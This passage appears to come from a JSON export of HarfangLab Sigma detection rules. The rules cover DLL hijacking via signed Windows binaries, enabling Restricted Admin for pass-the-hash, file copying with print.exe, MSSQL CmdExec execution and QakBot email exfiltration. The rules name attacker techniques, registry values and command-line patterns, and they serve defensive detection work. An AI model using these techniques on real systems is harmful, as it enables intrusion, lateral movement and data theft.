"content": "title: DLL Hijacking via msedge_pwa_launcher.exe\nid: 7ff782ca-cc4a-457f-899f-ba46c4f967a0\ndescription: |\n Detects potential Windows DLL Hijacking via msedge_pwa_launcher.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/msedge_pwa_launcher.exe-42D1DD5306CDE965B76373E4E2E210A3.html\ndate: 2023/11/17\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'msedge_pwa_launcher.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith:\n - '\\USERENV.dll'\n - '\\combase.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeCore\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7ff782ca-cc4a-457f-899f-ba46c4f967a0",
"rule_name": "DLL Hijacking via msedge_pwa_launcher.exe",
"rule_description": "Detects potential Windows DLL Hijacking via msedge_pwa_launcher.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-11-17",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8002bad8-8a9d-4911-9321-bd2bc2322429",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.620390Z",
"creation_date": "2026-03-23T11:45:34.620392Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.620396Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657",
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_enable_restricted_admin.yml",
"content": "title: Restricted Admin Enabled via Registry\nid: 8002bad8-8a9d-4911-9321-bd2bc2322429\ndescription: |\n Detects when the Restricted Admin feature is enabled by setting a specific registry key.\n Adversaries may enable Restricted Admin as it allows connections over RDP using the Pass-the-Hash technique.\n It is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using a privileged account.\nreferences:\n - https://www.elastic.co/security-labs/unmasking-financial-services-intrusion-ref0657\n - https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn408190(v=ws.11)\n - https://attack.mitre.org/techniques/T1112/\ndate: 2024/02/13\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin'\n Details: 'DWORD (0x00000000)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8002bad8-8a9d-4911-9321-bd2bc2322429",
"rule_name": "Restricted Admin Enabled via Registry",
"rule_description": "Detects when the Restricted Admin feature is enabled by setting a specific registry key.\nAdversaries may enable Restricted Admin as it allows connections over RDP using the Pass-the-Hash technique.\nIt is recommended to investigate this action to determine its legitimacy and investigate any suspicious authentications using a privileged account.\n",
"rule_creation_date": "2024-02-13",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "80198e01-52f5-4bde-b050-72b38a462907",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.295850Z",
"creation_date": "2026-03-23T11:45:35.295853Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295860Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Print/",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1564/004/"
],
"name": "t1105_file_copied_via_print.yml",
"content": "title: File Copied via print.exe\nid: 80198e01-52f5-4bde-b050-72b38a462907\ndescription: |\n Detects abuse of the Windows print.exe binary to copy files, which may indicate living-off-the-land activity used for defense evasion.\n Attackers can leverage this native utility to copy or stage files using a trusted Windows component, potentially evading security controls.\n It is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Print/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1564/004/\ndate: 2026/01/28\nmodified: 2026/02/16\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1564.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Print\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Print.exe'\n CommandLine|contains:\n - 'print /D:\\\\\\\\'\n - 'print /D:?:'\n - 'print.exe /D:\\\\\\\\'\n - 'print.exe /D:?:'\n ParentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n GrandparentImage|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\public\\'\n - '?:\\users\\\\*\\appdata\\'\n - '?:\\\\?Recycle.Bin\\'\n CurrentDirectory|startswith: '?:\\'\n\n condition: selection\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "80198e01-52f5-4bde-b050-72b38a462907",
"rule_name": "File Copied via print.exe",
"rule_description": "Detects abuse of the Windows print.exe binary to copy files, which may indicate living-off-the-land activity used for defense evasion.\nAttackers can leverage this native utility to copy or stage files using a trusted Windows component, potentially evading security controls.\nIt is recommended to analyze the execution chain associated with this alert to determine its legitimacy.\n",
"rule_creation_date": "2026-01-28",
"rule_modified_date": "2026-02-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1564.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "801a7bc0-ff7d-467e-91c6-47048e296a77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595616Z",
"creation_date": "2026-03-23T11:45:34.595619Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595627Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016",
"https://book.shentoushi.top/Databases/Mssql.html",
"https://attack.mitre.org/techniques/T1190/",
"https://attack.mitre.org/techniques/T1059/003/",
"https://attack.mitre.org/techniques/T1505/001/"
],
"name": "t1190_mssql_job_cmdexec_cmd.yml",
"content": "title: Suspicious Execution of cmd.exe via an MSSQL CmdExec Job\nid: 801a7bc0-ff7d-467e-91c6-47048e296a77\ndescription: |\n Detects the suspicious execution of cmd.exe via an MSSQL job using the CmdExec subsystem.\n Attackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\n It is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\nreferences:\n - https://learn.microsoft.com/en-us/sql/ssms/agent/create-a-cmdexec-job-step?view=sql-server-2016\n - https://book.shentoushi.top/Databases/Mssql.html\n - https://attack.mitre.org/techniques/T1190/\n - https://attack.mitre.org/techniques/T1059/003/\n - https://attack.mitre.org/techniques/T1505/001/\ndate: 2024/07/23\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1190\n - attack.execution\n - attack.t1059.003\n - attack.persistence\n - attack.t1505.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n GrandparentImage|endswith: '\\sqlagent.exe'\n ParentImage|endswith: '\\cmd.exe'\n\n filter_mssqltools:\n Image|endswith:\n - '\\Tools\\Binn\\\\*.exe'\n - '\\DTS\\Binn\\\\*.exe'\n - '\\COM\\\\*.exe'\n - '\\shared\\\\*.exe'\n - 'MSSQL\\\\Binn\\\\*.exe'\n - '?:\\Windows\\WID\\Binn\\SqlDumper.exe'\n ProcessSignature : 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n filter_mssqltools_unsigned:\n Image:\n - '?:\\Program Files (x86)\\Microsoft SQL Server\\80\\Tools\\Binn\\DTSRun.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\Tools\\Binn\\DTSRun.exe'\n\n exclusion_sqlplus:\n Image|endswith: '\\sqlplus.exe'\n\n exclusion_gselector:\n Image:\n - '?:\\Program Files\\RCS\\GSelector\\Database\\Backup\\zip.exe'\n - '?:\\Program Files\\RCS\\GSelector\\Database\\Backup\\RCS.GSelector.Services.BackupManager.ManifestWriter.exe'\n\n exclusion_restart_service:\n CommandLine:\n - 'NET START MSOLAP$KPI'\n - 'NET STOP MSOLAP$KPI'\n\n exclusion_xcopy:\n Image : '?:\\Windows\\System32\\xcopy.exe'\n\n exclusion_benign_cmd:\n Image: '?:\\Windows\\system32\\cmd.exe'\n CommandLine:\n - '?:\\Windows\\system32\\cmd.exe /S /D /c exit'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo y'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo.'\n - '?:\\Windows\\system32\\cmd.exe /S /D /c echo *;check_alwayson;0;AlwaysOn OK'\n\n exclusion_archive:\n Image|endswith:\n - ':\\Program Files\\7-Zip\\7z.exe'\n - '\\PKZIP.EXE'\n\n exclusion_common_export_tools:\n - Image:\n - '?:\\Windows\\System32\\ftp.exe'\n - '?:\\Windows\\System32\\forfiles.exe'\n - Image|endswith: '\\psftp.exe'\n Company: 'Simon Tatham'\n - Image|endswith:\n - '\\WinSCP.com'\n - '\\WinSCP.exe'\n Company: 'Martin Prikryl'\n - Image: '?:\\Windows\\System32\\cmd.exe'\n CommandLine|startswith: '?:\\WINDOWS\\system32\\cmd.exe /c ForFiles /'\n\n exclusion_normandinfo:\n Image: '?:\\Program Files\\Normand Info\\RADV Web\\radvwebbackup.exe'\n\n exclusion_nsca_sender:\n Image|endswith: 'NSCA\\send_nsca.exe'\n\n exclusion_conhost:\n CommandLine|endswith: '\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "801a7bc0-ff7d-467e-91c6-47048e296a77",
"rule_name": "Suspicious Execution of cmd.exe via an MSSQL CmdExec Job",
"rule_description": "Detects the suspicious execution of cmd.exe via an MSSQL job using the CmdExec subsystem.\nAttackers may execute a CmdExec job in order to gain code execution on a machine hosting a compromised database engine.\nIt is recommended to check if this behavior is expected and check for malicious activities stemming from the newly created process.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.initial_access",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1059.003",
"attack.t1190",
"attack.t1505.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8051fdf6-e79c-43be-99cd-a002fe7be9d7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086360Z",
"creation_date": "2026-03-23T11:45:34.086362Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086366Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/",
"https://attack.mitre.org/techniques/T1041/",
"https://attack.mitre.org/techniques/T1114/001/"
],
"name": "t1114_001_quakbot_collection_process.yml",
"content": "title: QakBot Malware Collection Detected\nid: 8051fdf6-e79c-43be-99cd-a002fe7be9d7\ndescription: |\n Detects the QuakBot email exfiltration process.\n To exflitrate emails, Quakbot spawns ping.exe and injects malicious exflitration code in it to collect emails from the device and exfiltrate them.\n It is recommended to analyze the code injected into \"ping.exe\" using a memry dump job as well as to determine stolen email by looking at the filesystem telemetry.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://attack.mitre.org/techniques/T1041/\n - https://attack.mitre.org/techniques/T1114/001/\ndate: 2022/04/22\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1114.001\n - attack.exfiltration\n - attack.t1041\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.Qakbot\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|endswith: '\\ping.exe -t 127.0.0.1'\n ParentImage|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n GrandparentImage|endswith:\n - '\\explorer.exe'\n - '\\iexplore.exe'\n - '\\OneDriveSetup.exe'\n - '\\msra.exe'\n - '\\mobsync.exe'\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8051fdf6-e79c-43be-99cd-a002fe7be9d7",
"rule_name": "QakBot Malware Collection Detected",
"rule_description": "Detects the QuakBot email exfiltration process.\nTo exflitrate emails, Quakbot spawns ping.exe and injects malicious exflitration code in it to collect emails from the device and exfiltrate them.\nIt is recommended to analyze the code injected into \"ping.exe\" using a memry dump job as well as to determine stolen email by looking at the filesystem telemetry.\n",
"rule_creation_date": "2022-04-22",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1114.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8055be23-57bb-4682-9f6d-89cd2d5f5649",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600095Z",
"creation_date": "2026-03-23T11:45:34.600098Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600106Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate.yml",
"content": "title: DLL Hijacking via rmactivate.exe\nid: 8055be23-57bb-4682-9f6d-89cd2d5f5649\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\msdrm.dll'\n - '\\isv.exe_rsaenh.dll'\n - '\\ssp.exe_rsaenh.dll'\n - '\\ssp_isv.exe_rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8055be23-57bb-4682-9f6d-89cd2d5f5649",
"rule_name": "DLL Hijacking via rmactivate.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "8057d04e-6aa4-4704-8df2-db71b9e14d77",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097908Z",
"creation_date": "2026-03-23T11:45:34.097910Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097914Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_werfaultsecure.yml",
"content": "title: DLL Hijacking via werfaultsecure.exe\nid: 8057d04e-6aa4-4704-8df2-db71b9e14d77\ndescription: |\n Detects potential Windows DLL Hijacking via werfaultsecure.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'werfaultsecure.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\faultrep.dll'\n - '\\wer.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "8057d04e-6aa4-4704-8df2-db71b9e14d77",
"rule_name": "DLL Hijacking via werfaultsecure.exe",
"rule_description": "Detects potential Windows DLL Hijacking via werfaultsecure.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "805af355-29f7-4a14-9fe3-f7a80b0442c8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607839Z",
"creation_date": "2026-03-23T11:45:34.607842Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607850Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securelist.com/bad-magic-apt/109087/",
"https://attack.mitre.org/techniques/T1559/"
],
"name": "t1559_powermagic_named_pipes_connected.yml",
